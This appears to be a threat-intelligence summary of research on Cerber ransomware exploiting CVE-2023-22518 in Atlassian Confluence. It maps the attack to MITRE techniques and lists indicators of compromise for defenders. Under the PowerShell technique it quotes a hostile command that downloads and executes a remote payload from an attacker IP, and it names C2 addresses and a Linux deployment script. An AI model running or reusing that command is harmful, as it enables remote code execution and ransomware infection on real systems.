Cerber ransomware exploits CVE-2023-22518 in Atlassian Confluence Data Center and Server to gain unauthorized admin privileges and deploy its payload. It uses an encoded PowerShell command to fetch the payload, encrypts files with the .L0CK3D extension, drops a ransom note, and even deploys Linux variants via a Bash script.
Key points
- Cerber ransomware exploited CVE-2023-22518 in Confluence to gain unauthorized administrator privileges on the instance.
- The vulnerability’s PoC was publicly leaked on November 2, 2023.
- The attack chain includes an encoded PowerShell command that downloads and executes a remote payload.
- The PowerShell script connects to a C2 server and downloads a malicious text file containing the payload.
- The ransomware encrypts files and appends the .L0CK3D extension, and drops a ransom note named read-me3.txt.
- A Linux variant is deployed via a Bash script (bapo.sh) downloaded from the same IP address.
- Trend Micro identifies the sample as Cerber by comparing it to older Cerber patterns and ransom-site similarities.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Exploitation of CVE-2023-22518 allowed unauthorized users to reset and create a Confluence administrator account. [‘exploiting this vulnerability allows unauthorized users to reset and create a Confluence instance administrator account’]
- [T1059.001] PowerShell – Encoded PowerShell command to download and execute a remote payload. [‘powershell.exe -exec bypass -nop -enc IEX((New-Object Net.WebClient).DownloadString(hxxp://193.176[.]179[.]41/tmp.37))’]
- [T1105] Ingress Tool Transfer – The PowerShell script will connect to the C2 server 193.187.172[.]73 and download a malicious text file. [‘The PowerShell script will connect to the command-and-control (C&C) server 193.187.172[.]73 and download a malicious text file.’]
- [T1486] Data Encrypted for Impact – The decoded Cerber payload encrypts files and appends the .L0CK3D extension. [‘which will then encrypt the files in the system and append the extension “.L0CK3D”’]
- [T1486] Data Encrypted for Impact – Ransom note is dropped (read-me3.txt) as part of impact activity. [‘It will also drop a ransom note with the filename “read-me3.txt” in all directories.’]
- [T1059.004] Unix Shell – Linux Bash script deployment (bapo.sh) downloads and executes a Linux Cerber variant. [‘bapo.sh, which downloads and executes a Linux Cerber ransomware variant.’]
Indicators of Compromise
- [IP Address] 193.176.179.41 – used in the encoded PowerShell command to fetch payload from a remote server
- [IP Address] 193.187.172.73 – C2/server from which the malicious text file is downloaded
- [File Name] read-me3.txt – ransom note dropped in all directories
- [File Extension] .L0CK3D – extension appended to encrypted files
- [File Name] bapo.sh – Linux Bash script downloaded from the same IP address to deploy a Linux Cerber variant
Read more: https://www.trendmicro.com/en_us/research/23/k/cerber-ransomware-exploits-cve-2023-22518.html